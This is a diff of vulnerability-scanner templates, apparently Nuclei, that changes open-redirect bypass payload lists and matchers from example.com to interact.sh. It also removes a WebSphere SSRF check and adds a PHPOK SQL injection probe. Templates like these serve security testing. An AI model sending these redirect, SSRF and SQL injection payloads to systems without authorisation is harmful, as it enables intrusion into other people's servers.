- '//example.com/%2F..'
- '//example.com//'
- '//example.com@//'
- '//example.com\texample.com/'
- '//https://example.com@//'
- '/<>//example.com'
- '/\/\/example.com/'
- '/\/example.com'
- '/\example.com'
- '/example.com'
- '/example.com/%2F..'
- '/example.com/'
- '/example.com/..;/css'
- '/https:example.com'
- '/{{RootURL}}example.com/'
- '/〱example.com'
- '/〵example.com'
- '/ゝexample.com'
- '/ーexample.com'
- '/ーexample.com'
- '<>//example.com'
- '@example.com'
- '@https://example.com'
- '\/\/example.com/'
- 'example%E3%80%82com'
- 'example.com'
- 'example.com/'
- 'example.com//'
- 'example.com;@'
- 'https%3a%2f%2fexample.com%2f'
- 'https:%0a%0dexample.com'
- 'https://%0a%0dexample.com'
- 'https://%09/example.com'
- 'https://%2f%2f.example.com/'
- 'https://%3F.example.com/'
- 'https://%5c%5c.example.com/'
- 'https://%5cexample.com@'
- 'https://%23.example.com/'
- 'https://.example.com'
- 'https://////example.com'
- 'https:///example.com'
- 'https:///example.com/%2e%2e'
- 'https:///example.com/%2f%2e%2e'
- 'https:///example.com@example.com/%2e%2e'
- 'https:///example.com@example.com/%2f%2e%2e'
- 'https://:80#@example.com/'
- 'https://:80?@example.com/'
- 'https://:@\@example.com'
- 'https://:@example.com\@example.com'
- 'https://:@example.com\@WillBeReplaced.com'
- 'https://;@example.com'
- 'https://\texample.com/'
- 'https://example.com/example.com'
- 'https://example.com/https://example.com/'
- 'https://www.\.example.com'
- 'https:/\/\example.com'
- 'https:/\example.com'
- 'https:/example.com'
- 'https:example.com'
- '{{RootURL}}example.com'
- '〱example.com'
- '〵example.com'
- 'ゝexample.com'
- 'ーexample.com'
- 'ーexample.com'
- '?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com'
- '%0a/interact.sh/'
- '%0d/interact.sh/'
- '%00/interact.sh/'
- '%09/interact.sh/'
- '%5C%5Cinteract.sh/%252e%252e%252f'
- '%5Cinteract.sh'
- '%5cinteract.sh/%2f%2e%2e'
- '%5c{{RootURL}}interact.sh/%2f%2e%2e'
- '../interact.sh'
- '.interact.sh'
- '/%5cinteract.sh'
- '////\;@interact.sh'
- '////interact.sh'
- '///interact.sh'
- '///interact.sh/%2f%2e%2e'
- '///interact.sh@//'
- '///{{RootURL}}interact.sh/%2f%2e%2e'
- '//;@interact.sh'
- '//\/interact.sh/'
- '//\@interact.sh'
- '//\interact.sh'
- '//\tinteract.sh/'
- '//interact.sh/%2F..'
- '//interact.sh//'
- '//interact.sh@//'
- '//interact.sh\tinteract.sh/'
- '//https://interact.sh@//'
- '/<>//interact.sh'
- '/\/\/interact.sh/'
- '/\/interact.sh'
- '/\interact.sh'
- '/interact.sh'
- '/interact.sh/%2F..'
- '/interact.sh/'
- '/interact.sh/..;/css'
- '/https:interact.sh'
- '/{{RootURL}}interact.sh/'
- '/〱interact.sh'
- '/〵interact.sh'
- '/ゝinteract.sh'
- '/ーinteract.sh'
- '/ーinteract.sh'
- '<>//interact.sh'
- '@interact.sh'
- '@https://interact.sh'
- '\/\/interact.sh/'
- 'interact%E3%80%82sh'
- 'interact.sh'
- 'interact.sh/'
- 'interact.sh//'
- 'interact.sh;@'
- 'https%3a%2f%2finteract.sh%2f'
- 'https:%0a%0dinteract.sh'
- 'https://%0a%0dinteract.sh'
- 'https://%09/interact.sh'
- 'https://%2f%2f.interact.sh/'
- 'https://%3F.interact.sh/'
- 'https://%5c%5c.interact.sh/'
- 'https://%5cinteract.sh@'
- 'https://%23.interact.sh/'
- 'https://.interact.sh'
- 'https://////interact.sh'
- 'https:///interact.sh'
- 'https:///interact.sh/%2e%2e'
- 'https:///interact.sh/%2f%2e%2e'
- 'https:///interact.sh@interact.sh/%2e%2e'
- 'https:///interact.sh@interact.sh/%2f%2e%2e'
- 'https://:80#@interact.sh/'
- 'https://:80?@interact.sh/'
- 'https://:@\@interact.sh'
- 'https://:@interact.sh\@interact.sh'
- 'https://:@interact.sh\@WillBeReplaced.com'
- 'https://;@interact.sh'
- 'https://\tinteract.sh/'
- 'https://interact.sh/interact.sh'
- 'https://interact.sh/https://interact.sh/'
- 'https://www.\.interact.sh'
- 'https:/\/\interact.sh'
- 'https:/\interact.sh'
- 'https:/interact.sh'
- 'https:interact.sh'
- '{{RootURL}}interact.sh'
- '〱interact.sh'
- '〵interact.sh'
- 'ゝinteract.sh'
- 'ーinteract.sh'
- 'ーinteract.sh'
- '?page=interact.sh&_url=interact.sh&callback=interact.sh&checkout_url=interact.sh&content=interact.sh&continue=interact.sh&continueTo=interact.sh&counturl=interact.sh&data=interact.sh&dest=interact.sh&dest_url=interact.sh&dir=interact.sh&document=interact.sh&domain=interact.sh&done=interact.sh&download=interact.sh&feed=interact.sh&file=interact.sh&host=interact.sh&html=interact.sh&http=interact.sh&https=interact.sh&image=interact.sh&image_src=interact.sh&image_url=interact.sh&imageurl=interact.sh&include=interact.sh&langTo=interact.sh&media=interact.sh&navigation=interact.sh&next=interact.sh&open=interact.sh&out=interact.sh&page=interact.sh&page_url=interact.sh&pageurl=interact.sh&path=interact.sh&picture=interact.sh&port=interact.sh&proxy=interact.sh&redir=interact.sh&redirect=interact.sh&redirectUri=interact.sh&redirectUrl=interact.sh&reference=interact.sh&referrer=interact.sh&req=interact.sh&request=interact.sh&retUrl=interact.sh&return=interact.sh&returnTo=interact.sh&return_path=interact.sh&return_to=interact.sh&rurl=interact.sh&show=interact.sh&site=interact.sh&source=interact.sh&src=interact.sh&target=interact.sh&to=interact.sh&uri=interact.sh&url=interact.sh&val=interact.sh&validate=interact.sh&view=interact.sh&window=interact.sh&redirect_to=interact.sh&ret=interact.sh&r2=interact.sh&img=interact.sh&u=interact.sh&r=interact.sh&URL=interact.sh&AuthState=interact.sh'
stop-at-first-match: true
matchers-condition: and
@ -111,7 +111,7 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status
status:

View File

@ -15,13 +15,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/redirect-to?url=https%3A%2F%2Fexample.com"
- "{{BaseURL}}/redirect-to?url=https%3A%2F%2Finteract.sh"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'location == "https://example.com"'
- 'location == "https://interact.sh"'
- type: status
status:

View File

@ -1,29 +0,0 @@
id: ibm-websphere-ssrf
info:
name: IBM WebSphere Portal SSRF
author: pdteam
severity: high
reference:
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
tags: ibm,ssrf,websphere
requests:
- method: GET
path:
- '{{BaseURL}}/docpicker/internal_proxy/http/example.com'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/example.com'
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Example Domain</title>"

View File

@ -13,7 +13,7 @@ requests:
path:
- "{{BaseURL}}"
headers:
l5d-dtab: /svc/* => /$/inet/example.com/443
l5d-dtab: /svc/* => /$/inet/interact.sh/443
matchers-condition: or
matchers:

View File

@ -12,10 +12,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://example.com/"
- "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://interact.sh/"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'

View File

@ -1,19 +1,18 @@
id: CVE-2020-22210
id: 74cms-sqli
info:
name: 74cms Sql Injection
author: princechaddha
severity: critical
description: A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php.
description: A SQL injection vulnerability exists in 74cms 5.0.1 AjaxPersonalController.class.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-22210
- https://github.com/blindkey/cve_like/issues/11
- https://github.com/possib1e/vuln/issues/3
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-22210
cwe-id: CWE-89
tags: cve,cve2020,74cms,sqli
tags: 74cms,sqli
requests:
- method: GET
@ -27,3 +26,4 @@ requests:
part: body
# Enhanced by mp on 2022/03/02
# Enhanced by ritikchaddha on 2022/05/05

View File

@ -9,10 +9,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569"
- "{{BaseURL}}/gotoURL.asp?url=interact.sh&id=43569"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$'
- '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*)$'

View File

@ -12,25 +12,25 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/bitrix/rk.php?goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
- type: status

View File

@ -14,13 +14,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo="
- "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9pbnRlcmFjdC5zaA=="
matchers-condition: and
matchers:
- type: word
words:
- "Location: https://evil.com"
- "Location: https://interact.sh"
part: header
- type: status

View File

@ -12,10 +12,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/"
- "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

View File

@ -13,10 +13,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/website/lang/en_US?r=https://example.com/"
- "{{BaseURL}}/website/lang/en_US?r=https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

View File

@ -13,10 +13,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com'
- '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -0,0 +1,21 @@
id: phpok-sqli
info:
name: PHPOK - Sql Injection
author: ritikchaddha
severity: high
metadata:
fofa-query: app="phpok"
tags: phpok,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{randstr}}))) --+"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'

Some files were not shown because too many files have changed in this diff Show More